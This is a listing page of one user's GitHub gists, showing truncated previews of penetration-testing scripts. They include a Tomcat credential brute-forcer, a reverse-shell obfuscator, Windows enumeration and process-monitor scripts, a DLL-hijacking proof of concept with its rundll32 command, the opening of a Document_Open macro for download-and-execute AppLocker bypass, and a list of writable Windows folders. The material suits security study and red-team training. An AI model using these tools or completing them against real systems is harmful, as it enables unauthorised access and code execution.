egre55

  • London
egre55 / tomcat_brute_force.py
Last active Jan 13, 2019
tomcat_brute_force
# author: @egre55
# script to automate the testing of common apache tomcat credentials
#!/usr/bin/env python
import sys
import requests
with open('tomcat-betterdefaultpasslist.txt') as f:
    for line in f:
egre55 / simple_case_obfuscator.sh
Created Nov 1, 2018
simple_case_obfuscator.sh
# simple case obfuscator
# author: @egre55
# usage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1
if [ "$1" == "" ]; then
printf "\nusage: ./simple_case_obfuscator.sh Invoke-PowerShellTcp.ps1\n\n"
exit 0
fi
file=$1
egre55 / IIS-LogParser.ps1
Last active Nov 1, 2018
IIS-LogParser.ps1
# author: @egre55
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)][string]$logfile
)
$host.UI.RawUI.BufferSize = new-object System.Management.Automation.Host.Size(600,20000)
while($true)
egre55 / Get-SituationalAwareness.ps1
Last active Oct 11, 2018
Get-SituationalAwareness.ps1
<#
Script will enumerate:
PowerShell Language Mode
Current user details
Current privileges
Domain and Forest functional levels
AD user information
AD computer information
egre55 / find_writable_locations.bat
Created Oct 11, 2018
find_writable_locations.bat
@echo off
REM Script to find writable locations under C:\
C:
cd C:\TEMP\
echo Creating list of all directories and sub-directories
dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
egre55 / procmon.ps1
Last active Oct 2, 2018
procmon.ps1
# Simple PowerShell process monitor
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
egre55 / procmon.bat
Last active Oct 1, 2018
procmon.bat
REM Ugly file-based process monitor script. Non-PowerShell in case blocked
@echo off
:loop
del file1.txt 2> nul
del file2.txt 2> nul
for /f "usebackq skip=1 tokens=* delims= " %%i in (`wmic path win32_process get commandline ^| findstr /r /v "[^\ ]"`) do echo %%i >> file1.txt
egre55 / calc.c
Created Jul 31, 2018
calc.c (calc.dll) by Holly Graceful @HollyGraceful
/*
cl.exe /LD calc.c
rundll32 shell32.dll,Control_RunDLL C:\Users\%username%\Desktop\calc.dll
calc.c by @HollyGraceful
https://www.gracefulsecurity.com/privesc-dll-hijacking/
*/
#include <windows.h>
int fireLazor()
{
egre55 / macro_download_and_execute_rundll32_powershdll_powershell.vba
Last active May 28, 2019
macro - download and execute applocker bypass (rundll32 / powershdll / powershell)
' based on
' https://stackoverflow.com/questions/17877389/how-do-i-download-a-file-using-vba-without-internet-explorer
'
' PowerShdll.dll by @p3nt4
' https://github.com/p3nt4/PowerShdll
'
' rundll32 is a good candidate as blocking this abuse binary impacts certain Windows functionality - RDP/Office right-click
' shortcuts, and "run-as" a non-privileged user (perhaps a functionality edge-case)
Sub Document_Open()
egre55 / locations_writable_by_non-admin_users_in_windows.txt
Last active Dec 4, 2018
locations_writable_by_non-admin_users_in_windows
## locations writable by non-admin users in Windows (Windows 10)
# default folders
C:\$Recycle.Bin\<USER SID> (whoami /user)
C:\Users\All Users (links to C:\ProgramData)
C:\PerfLogs
C:\ProgramData
C:\Windows\Tasks
C:\Windows\tracing